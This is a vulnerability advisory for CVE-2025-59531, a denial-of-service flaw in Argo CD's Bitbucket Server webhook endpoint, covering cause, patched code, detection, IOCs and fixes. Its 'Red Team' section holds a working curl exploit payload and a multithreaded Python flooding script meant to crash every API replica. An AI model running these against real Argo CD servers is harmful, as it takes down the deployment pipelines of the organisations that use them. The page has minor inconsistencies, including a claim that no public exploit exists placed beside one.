CVE-2025-59531
Executive Summary
CVE-2025-59531 is a high-severity denial-of-service (DoS) vulnerability affecting Argo CD, a popular GitOps continuous delivery tool for Kubernetes. The flaw resides in the /api/webhook endpoint, specifically in the handling of Bitbucket Server webhook payloads. When no webhook.bitbucketserver.secret is configured, an unauthenticated attacker can send a crafted HTTP POST request containing a malformed JSON payload where the repository.links.clone field is not an array (e.g., a string or object). This causes the API server to panic and crash, leading to a CrashLoopBackOff state. By targeting all replicas, an attacker can achieve a complete API outage, denying service to all legitimate clients.
The vulnerability affects a wide range of Argo CD versions from 1.2.0 up to the latest release candidates. The CVSS score is 7.5 (High) due to the low attack complexity, no authentication requirements, and high availability impact. No public exploit code or Nuclei templates are available at this time, but the vulnerability is trivial to reproduce.
This record — and 170,000+ others — are available via the ValtersIT API. One endpoint replaces five: NVD + GitHub CVE + CISA KEV + EPSS + Nuclei + Exploit-DB, unified.

Supply Chain & Package Security
Argo CD is distributed as a Go binary and container image. This vulnerability does not directly affect the software supply chain (e.g., dependency poisoning), but a successful DoS attack can disrupt CI/CD pipelines, preventing deployments and updates. Organizations using Argo CD in their software supply chain should prioritize patching to maintain operational integrity.

Deep Dive & Mechanics
The vulnerability is in the /api/webhook endpoint of Argo CD, which is designed to receive webhook events from Git providers (GitHub, GitLab, Bitbucket, etc.). When a Bitbucket Server webhook is received, the code parses the JSON payload to extract repository clone URLs. The vulnerable code path assumes that the repository.links.clone field is always an array of objects. However, if an attacker sends a payload where this field is a different type (e.g., a string or a JSON object), the Go code attempts to iterate over it as an array, causing a panic.
The panic is not recovered, leading to the crash of the API server process. If the API server is running in a Kubernetes deployment with multiple replicas, an attacker can send multiple requests to crash all replicas, resulting in a CrashLoopBackOff state and a complete denial of service.
The vulnerability is only exploitable when webhook.bitbucketserver.secret is not configured. If the secret is set, the endpoint validates the HMAC signature before processing the payload, and the malformed payload would be rejected before reaching the vulnerable code.
Vulnerable vs. Patched Code
Vulnerable Code (Go):
func (s *Server) handleBitbucketServerWebhook(w http.ResponseWriter, r *http.Request) {
// ... HMAC validation omitted if secret not set ...
var payload map[string]interface{}
json.NewDecoder(r.Body).Decode(&payload)
repository := payload["repository"].(map[string]interface{})
links := repository["links"].(map[string]interface{})
clones := links["clone"].([]interface{}) // <-- Assumes array, panics if not
for _, clone := range clones {
cloneMap := clone.(map[string]interface{})
// ... process clone URL ...
}
}
Patched Code (Go):
func (s *Server) handleBitbucketServerWebhook(w http.ResponseWriter, r *http.Request) {
// ... HMAC validation omitted if secret not set ...
var payload map[string]interface{}
json.NewDecoder(r.Body).Decode(&payload)
repository, ok := payload["repository"].(map[string]interface{})
if !ok {
http.Error(w, "invalid repository", http.StatusBadRequest)
return
}
links, ok := repository["links"].(map[string]interface{})
if !ok {
http.Error(w, "invalid links", http.StatusBadRequest)
return
}
clones, ok := links["clone"].([]interface{})
if !ok {
http.Error(w, "invalid clone field", http.StatusBadRequest)
return
}
for _, clone := range clones {
cloneMap, ok := clone.(map[string]interface{})
if !ok {
continue
}
// ... process clone URL ...
}
}
The fix adds type assertions with the ok pattern to safely check that each field is of the expected type before proceeding. If any field is malformed, the handler returns an HTTP 400 error instead of panicking.
Exploitation & Lab Setup
Red Team
Prerequisites:
- Target Argo CD instance with no
webhook.bitbucketserver.secretconfigured. - Network access to the
/api/webhookendpoint.
Exploit Payload:
curl -X POST https://target-argo-cd.example.com/api/webhook \
-H "Content-Type: application/json" \
-d '{
"repository": {
"links": {
"clone": "not_an_array"
}
}
}'
Explanation: This sends a malformed Bitbucket Server webhook payload where repository.links.clone is a string instead of an array. The vulnerable Argo CD API server will panic and crash. To achieve a full DoS, repeat the request targeting each replica's pod IP or use a load balancer to distribute the requests.
Automated DoS Script (Python):
import requests
import threading
target = "https://target-argo-cd.example.com/api/webhook"
payload = {
"repository": {
"links": {
"clone": "not_an_array"
}
}
}
def attack():
while True:
try:
requests.post(target, json=payload, timeout=5)
except:
pass
threads = []
for i in range(50):
t = threading.Thread(target=attack)
t.start()
threads.append(t)
for t in threads:
t.join()

Detection:
- Monitor for HTTP POST requests to
/api/webhookwith unusual JSON structures. - Look for repeated 500 Internal Server Error responses from the API server.
- Alert on sudden API server restarts or CrashLoopBackOff events in Kubernetes.
Mitigation:
- Configure
webhook.bitbucketserver.secretto enable HMAC validation. This prevents unauthenticated requests from reaching the vulnerable code. - Apply the patch by upgrading to a fixed version (2.14.20, 3.2.0-rc2, 3.1.8, or 3.0.19).
- If immediate patching is not possible, restrict network access to the
/api/webhookendpoint using a Web Application Firewall (WAF) or network policies.
Honeypot:
- Deploy a fake Argo CD endpoint that logs all incoming webhook payloads for analysis.
Indicators of Compromise (IOCs)
Network:
- HTTP POST requests to
/api/webhookwith a JSON body containing"clone": "not_an_array"or similar non-array values. - Repeated 500 Internal Server Error responses from the API server.
- API server logs containing panic messages like
interface conversion: interface {} is string, not []interface {}.
- HTTP POST requests to
System:
- Kubernetes events showing
CrashLoopBackOfffor Argo CD API server pods. - Pod restarts with exit code 2 (SIGABRT) due to Go panic.
- Kubernetes events showing
File:
- No file-based IOCs; the attack is purely network-based.

Remediation & Mitigation
Immediate Actions:
- Upgrade Argo CD to a patched version:
- 2.14.20 (for 2.x users)
- 3.2.0-rc2 (for 3.x release candidates)
- 3.1.8 (for 3.1.x users)
- 3.0.19 (for 3.0.x users)
- Configure
webhook.bitbucketserver.secretif using Bitbucket Server webhooks. This enables HMAC signature validation, which blocks unauthenticated requests. - Restrict network access to the
/api/webhookendpoint using a WAF or Kubernetes NetworkPolicy to allow only trusted IP ranges.
Long-Term Measures:
- Implement input validation for all webhook payloads, not just Bitbucket Server.
- Add panic recovery middleware to the API server to prevent crashes from unhandled errors.
- Conduct regular security audits of webhook handling code.
- Monitor for similar vulnerabilities in other Git provider webhook handlers.
Workaround: If patching is not immediately possible, disable the Bitbucket Server webhook integration entirely by removing the webhook configuration from Argo CD settings.
